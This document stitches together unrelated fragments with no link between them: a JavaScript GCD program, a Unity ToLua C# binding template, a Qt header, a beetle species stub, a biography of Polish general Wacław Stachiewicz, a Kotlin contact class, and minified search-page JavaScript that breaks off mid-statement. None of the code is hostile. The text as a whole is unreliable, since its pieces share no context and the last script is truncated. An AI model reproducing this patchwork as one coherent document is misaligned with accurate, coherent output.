```javascript // Euclidean Algorithm to find GCD of two numbers // Function to return gcd of a and b function gcd(a, b) { // base case if(b == 0) { return a; } return gcd(b, a % b); } // Used synchronous readline package to take console input var readlineSync = require('readline-sync'); var a = readlineSync.question('Enter first Number'); a = parseInt(a); var b = readlineSync.question('Enter second number'); b = parseInt(b); var result = gcd(a, b); console.log("The GCD is" + " " + result) /* Sample Input : 9 6 Sample Output : The GCD is 3 */ ```
```smalltalk using UnityEngine; using System.Collections; using LuaInterface; using System; public class ToLua_UnityEngine_GameObject { public static string SendMessageDefined = @" IntPtr L0 = LuaException.L; try { ++LuaException.SendMsgCount; LuaException.L = L; int count = LuaDLL.lua_gettop(L); if (count == 2 && TypeChecker.CheckTypes<string>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); obj.SendMessage(arg0); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 3 && TypeChecker.CheckTypes<string, UnityEngine.SendMessageOptions>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); UnityEngine.SendMessageOptions arg1 = (UnityEngine.SendMessageOptions)ToLua.ToObject(L, 3); obj.SendMessage(arg0, arg1); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 3 && TypeChecker.CheckTypes<string, object>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); object arg1 = ToLua.ToVarObject(L, 3); obj.SendMessage(arg0, arg1); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 4 && TypeChecker.CheckTypes<string, object, UnityEngine.SendMessageOptions>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); object arg1 = ToLua.ToVarObject(L, 3); UnityEngine.SendMessageOptions arg2 = (UnityEngine.SendMessageOptions)ToLua.ToObject(L, 4); obj.SendMessage(arg0, arg1, arg2); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else { --LuaException.SendMsgCount; LuaException.L = L0; return LuaDLL.luaL_throw(L, ""invalid arguments to method: UnityEngine.GameObject.SendMessage""); } } catch(Exception e) { --LuaException.SendMsgCount; LuaException.L = L0; return LuaDLL.toluaL_exception(L, e); }"; public static string SendMessageUpwardsDefined = @" IntPtr L0 = LuaException.L; try { ++LuaException.SendMsgCount; LuaException.L = L; int count = LuaDLL.lua_gettop(L); if (count == 2 && TypeChecker.CheckTypes<string>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); obj.SendMessageUpwards(arg0); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 3 && TypeChecker.CheckTypes<string, UnityEngine.SendMessageOptions>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); UnityEngine.SendMessageOptions arg1 = (UnityEngine.SendMessageOptions)ToLua.ToObject(L, 3); obj.SendMessageUpwards(arg0, arg1); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 3 && TypeChecker.CheckTypes<string, object>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); object arg1 = ToLua.ToVarObject(L, 3); obj.SendMessageUpwards(arg0, arg1); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 4 && TypeChecker.CheckTypes<string, object, UnityEngine.SendMessageOptions>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); object arg1 = ToLua.ToVarObject(L, 3); UnityEngine.SendMessageOptions arg2 = (UnityEngine.SendMessageOptions)ToLua.ToObject(L, 4); obj.SendMessageUpwards(arg0, arg1, arg2); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else { --LuaException.SendMsgCount; LuaException.L = L0; return LuaDLL.luaL_throw(L, ""invalid arguments to method: UnityEngine.GameObject.SendMessageUpwards""); } } catch (Exception e) { --LuaException.SendMsgCount; LuaException.L = L0; return LuaDLL.toluaL_exception(L, e); }"; public static string BroadcastMessageDefined = @" IntPtr L0 = LuaException.L; try { ++LuaException.SendMsgCount; LuaException.L = L; int count = LuaDLL.lua_gettop(L); if (count == 2 && TypeChecker.CheckTypes<string>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); obj.BroadcastMessage(arg0); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 3 && TypeChecker.CheckTypes<string, UnityEngine.SendMessageOptions>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); UnityEngine.SendMessageOptions arg1 = (UnityEngine.SendMessageOptions)ToLua.ToObject(L, 3); obj.BroadcastMessage(arg0, arg1); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 3 && TypeChecker.CheckTypes<string, object>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); object arg1 = ToLua.ToVarObject(L, 3); obj.BroadcastMessage(arg0, arg1); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else if (count == 4 && TypeChecker.CheckTypes<string, object, UnityEngine.SendMessageOptions>(L, 2)) { UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); string arg0 = ToLua.ToString(L, 2); object arg1 = ToLua.ToVarObject(L, 3); UnityEngine.SendMessageOptions arg2 = (UnityEngine.SendMessageOptions)ToLua.ToObject(L, 4); obj.BroadcastMessage(arg0, arg1, arg2); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } --LuaException.SendMsgCount; LuaException.L = L0; return 0; } else { --LuaException.SendMsgCount; LuaException.L = L0; return LuaDLL.luaL_throw(L, ""invalid arguments to method: UnityEngine.GameObject.BroadcastMessage""); } } catch (Exception e) { --LuaException.SendMsgCount; LuaException.L = L0; return LuaDLL.toluaL_exception(L, e); }"; public static string AddComponentDefined = @" IntPtr L0 = LuaException.L; try { ++LuaException.InstantiateCount; LuaException.L = L; ToLua.CheckArgsCount(L, 2); UnityEngine.GameObject obj = (UnityEngine.GameObject)ToLua.CheckObject(L, 1, typeof(UnityEngine.GameObject)); System.Type arg0 = ToLua.CheckMonoType(L, 2); UnityEngine.Component o = obj.AddComponent(arg0); if (LuaDLL.lua_toboolean(L, LuaDLL.lua_upvalueindex(1))) { string error = LuaDLL.lua_tostring(L, -1); LuaDLL.lua_pop(L, 1); throw new LuaException(error, LuaException.GetLastError()); } ToLua.Push(L, o); LuaException.L = L0; --LuaException.InstantiateCount; return 1; } catch (Exception e) { LuaException.L = L0; --LuaException.InstantiateCount; return LuaDLL.toluaL_exception(L, e); }"; [UseDefinedAttribute] public void SendMessage(string methodName) { } [UseDefinedAttribute] public void SendMessageUpwards(string methodName) { } [UseDefinedAttribute] public void BroadcastMessage(string methodName) { } [UseDefinedAttribute] public void AddComponent(Type t) { } } ```
```objective-c /* This file is part of JQTools Project introduce: path_to_url Contact email: Jason@JasonServer.com GitHub: path_to_url */ #ifndef GROUP_TEXTGROUP_UTF16TRANSFORM_CPP_UTF16TRANSFORM_H_ #define GROUP_TEXTGROUP_UTF16TRANSFORM_CPP_UTF16TRANSFORM_H_ // JQToolsLibrary import #include <JQToolsLibrary> #define UTF16TRANSFORM_INITIALIZA \ { \ qmlRegisterType<Utf16Transform::Manage>("Utf16Transform", 1, 0, "Utf16TransformManage"); \ } namespace Utf16Transform { class Manage: public AbstractTool { Q_OBJECT Q_DISABLE_COPY(Manage) public: Manage() = default; ~Manage() = default; public slots: QString toUtf16(const QString &string); QString fromUtf16(const QString &string); }; } #endif//GROUP_TEXTGROUP_UTF16TRANSFORM_CPP_UTF16TRANSFORM_H_ ```
Aemocia borneana is a species of beetle in the family Cerambycidae. It was described by Stephan von Breuning in 1974. It is known from Borneo. References Mesosini Beetles described in 1974
Wacław Teofil Stachiewicz (19 November 1894 – 12 November 1973) was a Polish writer, geologist, military commander and general of the Polish Army. A brother to General Julian Stachiewicz and the husband to General Roman Abraham's sister, Stachiewicz was the Chief of General Staff of the Polish Army during the Polish Defensive War of 1939. Early life and career Wacław Teofil Stachiewicz was born 19 November 1894, in Lwów (also known as Lemberg and L'viv), Galicia, Austria-Hungary. After graduating from one of local gymnasiums, he entered the geological faculty at the University of Lwów. In 1912, he joined the underground Związek Strzelecki, where he received military training and graduated from NCO and officer courses. After the outbreak of the Great War in August 1914, Stachiewicz joined the Polish Legions in which he became a platoon commander in the 1st Regiment. On 9 October, he was promoted to second lieutenant and sent with a secret mission to the other side of the Russo-Austrian Front to help the creation of Polish underground organisations in the territory that was still under Russian occupation. In 1915, he was moved to the newly formed 5th Regiment in which he commanded the 4th company. Wounded at the Battle of Konary, he was moved to various staff duties, such as serving as an aide to the chief of staff of the regiment. In March 1917, he graduated from an officer course of the General Staff and was to be promoted. Oath Crisis and rebirth of Polish Army However, the Oath Crisis of 1917 caused Stachiewicz to be drafted into the Austro-Hungarian Army, demoted to sergeant and sent to the Italian Front. In March 1918, he defected from the army, returned to Poland and joined the secret Polish Military Organisation. He headed its central branch, based in Warsaw. After Poland regained its independence, the organization became one of the cores of the reborn Polish Armed Forces. Initially serving as the head of the I Detachment of the General Staff and the deputy chief of staff of the Warsaw military district, Stachiewicz soon became a staff officer of General Stanisław Haller's Army. He also served in a number of roles in the Polish Ministry of War Affairs. During the Battle of Warsaw (1920), he served as a deputy chief of staff and chief of operations of General Kazimierz Sosnkowski's Volunteer Army. After the end of hostilities and the Peace of Riga, Stachiewicz returned to the ministry. In 1921, Stachiewicz was sent to Paris, where he graduated from the École supérieure de guerre in late 1923. Upon his return, he became a professor of tactics at the Wyższa Szkoła Wojenna in Warsaw. In April 1926, he started a year of practice at the post of head of the 1st detachment of the Polish General Staff. In June 1927, he became the first officer of the Staff of the General Inspectorate of Armed Forces. In January 1928, he completed his practice as the commanding officer of the Częstochowa-based 27th Infantry Regiment. Finally, after a year of training there, he became the chief of infantry in the elite 1st Legions Infantry Division in Wilno. In December 1933, he returned to Częstochowa, this time as a commanding officer of the entire 7th Infantry Division. In 1935, he was promoted to the rank of brigadier general. After the death of Marshal of Poland, Józef Piłsudski, Stachiewicz's place was taken by General Edward Rydz-Śmigły, who nominated him for the post of the Chief of Staff of the Polish Army. World War II, exile and death One of the most promising staff officers in the Polish military, Stachiewicz was the author of various military plans, such as Plan Zachód, the Polish plan of operations in case of a war against Nazi Germany, and Plan Wschód, a similar plan in case of a war against the Soviet Union. He was also the officer to prepare the Polish mobilisation. In late 1939, he supervised the successful mobilisation although it was called off because of British and French pressure. After the outbreak of the Polish Defensive War, he automatically became the Chief of Staff of the headquarters of the Polish commander-in-chief. However, lack of communication made him lose any influence on the conflict, and he and Rydz-Śmigły withdrew to south-eastern Poland. After the Soviets joined the war on the side of the Nazis, he crossed the border on 18 September with Romania to continue the struggle abroad in France. However, internal struggle for power among the Polish emigres made the French pressure the Romanian authorities into interning Stachiewicz and his superior. In January 1940, Stachiewicz managed to escape from captivity and, through Bucharest and Yugoslavia, reached the French-held port of Algiers. However, General Władysław Sikorski insisted for another internment, this time by the French, and it was not until 1943 that Stachiewicz finally reached London. There, he spent the remaining part of the war without any assignment. After World War II, he was deprived of his Polish citizenship by the Soviet-backed communist authorities of Poland and had to remain in exile. In 1948, Stachiewicz moved to Montreal, Canada. Blamed by many for the Polish defeat in the war, Stachiewicz devoted himself to writing and wrote several books on the Polish preparations for the war of 1939. Death and legacy He died on 12 November 1973. The Polish Library of the McGill University is named after him. Honours and awards Silver Cross of the Virtuti Militari Commanders of the Polonia Restituta, previously awarded the Officer's Cross Cross of Independence with Swords Cross of Valour – four times Gold Cross of Merit Knight's Cross of the Legion of Honour Order of the Cross of the Eagle, Class I (Estonia, 1937) See also Invasion of Poland Second Polish Republic Bibliography 1894 births 1973 deaths Military personnel from Lviv People from the Kingdom of Galicia and Lodomeria Polish Austro-Hungarians Polish generals Polish male writers 20th-century Polish geologists Polish Military Organisation members Polish legionnaires (World War I) Austro-Hungarian military personnel of World War I Polish people of the Polish–Soviet War Polish military personnel of World War II Polish emigrants to Canada Polish exiles Recipients of the Silver Cross of the Virtuti Militari Recipients of the Cross of Independence with Swords Commanders of the Order of Polonia Restituta Recipients of the Cross of Valour (Poland) Recipients of the Gold Cross of Merit (Poland) Knights of the Legion of Honour Recipients of the Military Order of the Cross of the Eagle, Class I
```kotlin package mega.privacy.android.domain.entity /** * Contact * * @property userId * @property email * @property nickname * @property firstName * @property lastName * @property hasPendingRequest * @property isVisible */ data class Contact @JvmOverloads constructor( val userId: Long, val email: String?, val nickname: String? = null, val firstName: String? = null, val lastName: String? = null, val hasPendingRequest: Boolean = false, val isVisible: Boolean = false, ) { /** * Short name */ val shortName: String? = nickname?.takeIf { it.isNotEmpty() } ?: firstName?.takeIf { it.isNotEmpty() } ?: lastName?.takeIf { it.isNotEmpty() } ?: email?.takeIf { it.isNotEmpty() } /** * Full name */ val fullName: String? = nickname?.takeIf { it.isNotEmpty() } ?: if (!firstName.isNullOrEmpty() && !lastName.isNullOrEmpty()) { "$firstName $lastName" } else { firstName?.takeIf { it.isNotBlank() } ?: lastName?.takeIf { it.isNotBlank() } ?: email?.takeIf { it.isNotBlank() } } } ```
```javascript _w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.parentNode}return!1}function y(n){window.location.href=n}function p(n,t){n.style.filter=t>=100?"":"alpha(opacity="+t+")";n.style.opacity=t/100}var i=sb_ie;t.forEach=s;t.wrap=r;t.preventDefault=u;t.stopPropagation=f;t.getOffset=e;t.getTime=o;window.sj_b=document.body;window.sb_de=document.documentElement;window.sj_wf=r;window.sj_pd=u;window.sj_sp=f;window.sj_go=e;window.sj_ev=h;window.sj_et=c;window.sj_mi=l;window.sj_mo=a;window.sj_we=v;window.sb_gt=o;window.sj_so=p;window.sj_lc=y});define("env",["require","exports","shared"],function(n,t,i){function v(n,t){return t.length&&typeof n=="function"?function(){return n.apply(null,t)}:n}function y(n,t){var e=[].slice.apply(arguments).slice(2),u=v(n,e),i;return i=window.setImmediate&&!window.setImmediate.Override&&(!t||t<=16)?"i"+setImmediate(u):o(u,t),f[r]=i,r=(r+1)%a,i}function p(n,t){var r=[].slice.apply(arguments).slice(2),i=l(v(n,r),t);return e[u]=i,u=(u+1)%a,i}function w(){h.forEach(f,s);h.forEach(e,window.clearInterval);r=u=e.length=f.length=0}function s(n){n!=null&&(typeof n=="string"&&n.indexOf("i")===0?window.clearImmediate(parseInt(n.substr(1),10)):c(n))}var h=i,f=[],e=[],o,c,l,a=1024,r=0,u=0;o=window.setTimeout;t.setTimeout=y;l=window.setInterval;t.setInterval=p;t.clear=w;c=window.clearTimeout;t.clearTimeout=s;window.sb_rst=o;window.setTimeout=window.sb_st=y;window.setInterval=window.sb_si=p;window.clearTimeout=window.sb_ct=s});define("event.custom",["require","exports","shared","env"],function(n,t,i,r){function f(n){return u[n]||(u[n]=[])}function e(n,t){n.d?l.setTimeout(c.wrap(n,t),n.d):n(t)}function v(n){for(var t in u)t.indexOf(a)===0||n!=null&&n[t]!=null||delete u[t]}function o(n){for(var t,u,i,o=[],r=0;r<arguments.length-1;r++)o[r]=arguments[r+1];for(t=f(n),u=t.e=arguments,i=0;i<t.length;i++)t[i].alive&&e(t[i].func,u)}function s(n,t,i,r){var u=f(n);t&&(t.d=r,u.push({func:t,alive:!0}),i&&u.e&&e(t,u.e))}function h(n,t){for(var i=0,r=u[n];r&&i<r.length;i++)if(r[i].func==t&&r[i].alive){r[i].alive=!1;break}}var c=i,l=r,u={},a="ajax.";t.reset=v;t.fire=o;t.bind=s;t.unbind=h;_w.sj_evt={bind:s,unbind:h,fire:o}});define("event.native",["require","exports","event.custom"],function(n,t,i){function r(n,t,r,u){var f=n===window||n===document||n===document.body;n&&(f&&t=="load"?i.bind("onP1",r,!0):f&&t=="unload"?i.bind("unload",r,!0):n.addEventListener?n.addEventListener(t,r,u):n.attachEvent?n.attachEvent("on"+t,r):n["on"+t]=r)}function u(n,t,r,u){var f=n===window||n===document||n===document.body;n&&(f&&t=="load"?i.unbind("onP1",r):f&&t=="unload"?i.unbind("unload",r):n.removeEventListener?n.removeEventListener(t,r,u):n.detachEvent?n.detachEvent("on"+t,r):n["on"+t]=null)}t.bind=r;t.unbind=u;window.sj_be=r;window.sj_ue=u});define("onHTML",["require","exports","event.custom"],function(n,t,i){i.fire("onHTML")});define("dom",["require","exports","env","shared","event.native","event.custom"],function(n,t,i,r,u,f){function o(n,t){function c(n,t,i,r){i&&u.unbind(i,r,c);f.bind("onP1",function(){if(!n.l){n.l=1;var i=e("script");i.setAttribute("data-rms","1");i.src=(t?"/fd/sa/"+_G.Ver:"/sa/"+_G.AppVer)+"/"+n.n+".js";_d.body.appendChild(i)}},!0,5)}for(var o=arguments,s,h,i=2,l={n:n};i<o.length;i+=2)s=o[i],h=o[i+1],u.bind(s,h,r.wrap(c,l,t,s,h));i<3&&c(l,t)}function s(){var n=_d.getElementById("ajaxStyles");return n||(n=_d.createElement("div"),n.id="ajaxStyles",_d.body.insertBefore(n,_d.body.firstChild)),n}function l(n){var t=e("script");t.type="text/javascript";t.text=n;t.setAttribute("data-bing-script","1");document.body.appendChild(t);i.setTimeout(function(){document.body.removeChild(t)},0)}function a(n){var t=e("script");t.type="text/javascript";t.src=n;t.onload=i.setTimeout(function(){document.body.removeChild(t)},0);document.body.appendChild(t)}function h(n){var t=c("ajaxStyle");t||(t=e("style"),t.setAttribute("data-rms","1"),t.id="ajaxStyle",s().appendChild(t));t.textContent!==undefined?t.textContent+=n:t.styleSheet.cssText+=n}function c(n){return _d.getElementById(n)}function e(n,t,i){var r=_d.createElement(n);return t&&(r.id=t),i&&(r.className=i),r}t.loadJS=o;t.getCssHolder=s;t.includeScript=l;t.includeScriptReference=a;t.includeCss=h;_w._ge=c;_w.sj_ce=e;_w.sj_jb=o;_w.sj_ic=h});define("cookies",["require","exports"],function(n,t){function r(n,t){var r,u;return i?null:(r=_d.cookie.match(new RegExp("\\b"+n+"=[^;]+")),t&&r)?(u=r[0].match(new RegExp("\\b"+t+"=([^&]*)")),u?u[1]:null):r?r[0]:null}function u(n,t,u,f,e,o){var c,s,h,l;if(!i){s=t+"="+u;h=r(n);h?(l=r(n,t),c=l?h.replace(t+"="+l,s):h+"&"+s):c=n+"="+s;var a=location.hostname.match(/([^.]+\.[^.]*)$/),v=o&&o>0?o*6e4:63072e6,y=new Date((new Date).getTime()+Math.min(v,63072e6));_d.cookie=c+(a?";domain="+a[0]:"")+(f?";expires="+y.toGMTString():"")+(e?";path="+e:"")}}function f(n){if(!i){var r=n+"=",t=location.hostname.match(/([^.]+\.[^.]*)$/);_d.cookie=r+(t?";domain="+t[0]:"")+";expires="+e}}var i=!1,e=new Date(0).toGMTString(),o;try{o=_d.cookie}catch(s){i=!0}t.get=r;t.set=u;t.clear=f;_w.sj_cook={get:r,set:u,clear:f}});define("rmsajax",["require","exports","event.custom"],function(n,t,i){function l(){for(var i,n=[],t=0;t<arguments.length;t++)n[+t]=arguments[t];if(n.length!=0){if(i=n[n.length-1],n.length==1)ot(i)&&f.push(i);else if(n.length==3){var o=n[0],s=n[1],u=n[2];st(o)&&st(s)&&ot(u)&&(ht(r,o,u),ht(e,s,u))}return window.rms}}function nt(){var i=arguments,n,t;for(o.push(i),n=0;n<i.length;n++)t=i[n],ct(t,r),t.d&&tt.call(null,t);return window.rms}function bt(){var t=arguments,n;for(s.push(t),n=0;n<t.length;n++)ct(t[n],e);return window.rms}function a(){var t,i,n;for(ii(),t=!1,n=0;n<o.length;n++)t=tt.apply(null,p.call(o[n],0))||t;for(i=0;i<s.length;i++)t=ni.apply(null,p.call(s[i],0))||t;if(!t)for(n=0;n<f.length;n++)f[n]()}function tt(){var n=arguments,t,i,f,e;if(n.length===0)return!1;if(t=r[ut(n[0])],n.length>1)for(i=ri.apply(null,n),f=0;f<i.length;f++)e=i[f],e.run=u,kt(e,function(n){return function(){dt(n,i)}}(e));else t.run=u,ft(t,function(){it(t)});return!0}function kt(n,t){var r,i;if(!n.state){if(n.state=yt,at(n)){t();return}window.ActiveXObject!==undefined||wt.test(navigator.userAgent)?(r=new Image,r.onload=t,r.onerror=t,r.src=n.url):(i=new XMLHttpRequest,i.open("GET",n.url,!0),i.onreadystatechange=function(){i.readyState==4&&t()},i.send())}}function dt(n,t){n.run==u&&(n.state=w,rt(t))}function gt(n,t){n.run==u&&ft(n,function(n){return function(){it(n,t)}}(n))}function it(n,t){n.run==u&&(n.state=c,ti(n),t)&&rt(t)}function rt(n){for(var i,t=0;t<n.length;t++){i=n[t];switch(i.state){case w:gt(i,n);return;case c:continue}return}}function ut(n){for(var t in n)return t}function ni(){return!1}function ti(n){for(var t=0;t<n.callbacks.length;t++)n.callbacks[t].dec()}function ft(n,t){var i,e,o,u,r;if(n.state!=b&&n.state!=c)if(n.state=b,i=h.createElement("SCRIPT"),i.type="text/javascript",i.setAttribute("data-rms","1"),i.onreadystatechange=i.onload=function(){var n=i.readyState;(!n||/loaded|complete/.test(n))&&et(t)},at(n)){if(e=n.app?d:k,(o=h.getElementById(e))&&(u=o.childNodes)&&u[n.pos]&&(r=u[n.pos].innerHTML,r!=="")){var s=4,l=3,f=r.length,a=r.substring(0,s),v=r.substring(f-l,f);a=="<!--"&&v=="-->"&&(r=r.substring(s,f-l));i.text=r;h.body.appendChild(i)}et(t)}else i.src=n.url,h.body.appendChild(i)}function et(n){n.done||(n.done=!0,n())}function ot(n){return g.call(n)=="[object Function]"}function st(n){return g.call(n)=="[object Array]"}function ht(n,t,i){for(var u,f=new v(i),r=0;r<t.length;r++)u=n[t[r]],u||(u=lt(n,t[r])),y(u,f)}function ii(){for(var t,i,u,n=0;n<f.length;n++){t=new v(f[n]);for(i in r)y(r[i],t);for(u in e)y(e[u],t)}}function y(n,t){n.callbacks.push(t);t.inc()}function ct(n,t){for(var i in n)if(typeof n[i]!=undefined)return lt(t,i,n[i])}function lt(n,t,i){return n[t]||(n[t]={callbacks:[],onPrefetch:[]},n[t].key=t),t.indexOf(pt)==0&&(n[t].app=!0),isNaN(i)?n[t].url=i:n[t].pos=i,n[t]}function ri(){for(var i,t=[],n=0;n<arguments.length;n++)i=ut(arguments[n]),t.push(r[i]);return t}function at(n){return!n.url}function ui(){var n,t;r={};e={};f=[];o=[];s=[];u+=1;n=document.getElementById(k);n&&n.parentNode.removeChild(n);t=document.getElementById(d);t&&t.parentNode.removeChild(t);vt()}function vt(){i.bind("onP1Lazy",function(){l(function(){i.fire("onP1")});a()},!0)}var p=[].slice,yt=1,w=2,b=3,c=4,u=0,pt="A:",k="fRmsDefer",d="aRmsDefer",r={},e={},f=[],o=[],s=[],g=Object.prototype.toString,h=document,wt=/edge/i,v;t.onload=l;t.js=nt;t.css=bt;t.start=a;v=function(n){var t=0,i=!1;this.inc=function(){i||t++};this.dec=function(){i||(t--,t==0&&(i=!0,n()))}};t.reset=ui;vt();window.rms={onload:l,js:nt,start:a}});_w.LogUploadCapFeatureEnabled=!1;_w.InstLogQueueKeyFetcher={Get:function(n){var t="eventLogQueue";return n.indexOf("proactive")==1||n.indexOf("search")==1||n.indexOf("zinc")==1?t+"_Online":t+"_Offline"},GetSharedLocation:function(){return"eventLogQueue_Shared"},CanUploadSharedMessages:function(n){return _w.useSharedLocalStorage&&n.indexOf("AS/API")===1?!0:!1}};define("clientinst",["require","exports","env","event.native","event.custom","shared"],function(n,t,i,r,u,f){function g(n,t,f,o){v||(nt("Init","CI","Base",!1),c=i.setTimeout(e,p),v=1,r.bind(window,"beforeunload",e,!1),u.bind("unload",function(){ot()},!1));nt(n,t,f,o,[].slice.apply(arguments).slice(4))}function nt(n,t,i,r,u){var c="",y,a,v;if(u)for(y=0;y<u.length;y+=2)a=u[y],v=u[y+1],(typeof a!="string"||a[it]('"')<0)&&(a='"'+a+'"'),typeof v!="string"||v.match(ut)||(v='"'+v.replace(rt,'\\"')+'"'),c+=a+":"+v+",";c+='"T":"CI.'+n+'",'+(typeof t=="number"?'"K":'+t:'"FID":"'+t+'"')+',"Name":"'+i+'","TS":'+f.getTime();c=o("{"+c+"}");et[l]+s[l]+c[l]>=ft&&e();s+=o(h?",":"")+c;h=1;r&&e()}function tt(n,t,i,r){var u=n[t];n[t]=function(){var n=arguments,e,t,f;if(r&&i[a](this,n),e=u[a](this,n),!r){for(t=[],f=0;f<n.length;f++)t.push(n[f]);t.push(e);i[a](this,t)}return e}}function ot(){v=0;e()}function e(){c&&clearTimeout(c);h&&(d.src=w+_G.lsUrl+"&TYPE=Event.ClientInst&DATA="+s+o("]"),h=0,s=o("["));c=i.setTimeout(e,p)}var o=encodeURIComponent,l="length",it="indexOf",a="apply",rt=/"/g,ut=/^\s*[{\["].*["}\]]\s*$/g,p=2e3,ft=2e3,s=o("["),h=0,v=0,c,w="",et=_G.lsUrl+"&TYPE=Event.ClientInst&DATA=",b=location.hostname.match(/([^.]+\.[^.]*)$/),y,k,d;b&&(y=location.protocol,k=y=="https:"?"www":"a4",w=y+"//"+k+"."+b[0]);d=new Image;t.Log=g;t.Wrap=tt;window.Log={Log:g,Wrap:tt}});define("replay",["require","exports","fallback"],function(n,t,i){i.replay()});var sj_anim=function(n){var s=25,t=this,c,u,h,f,e,o,l,i,r;t.init=function(n,s,a,v,y){if(c=n,e=s,o=a,l=v,r=y,v==0){f=h;r&&r();return}i||(i=e);u||t.start()};t.start=function(){h=sb_gt();f=Math.abs(o-i)/l*s;u=setInterval(t.next,s)};t.stop=function(){clearInterval(u);u=0};t.next=function(){var 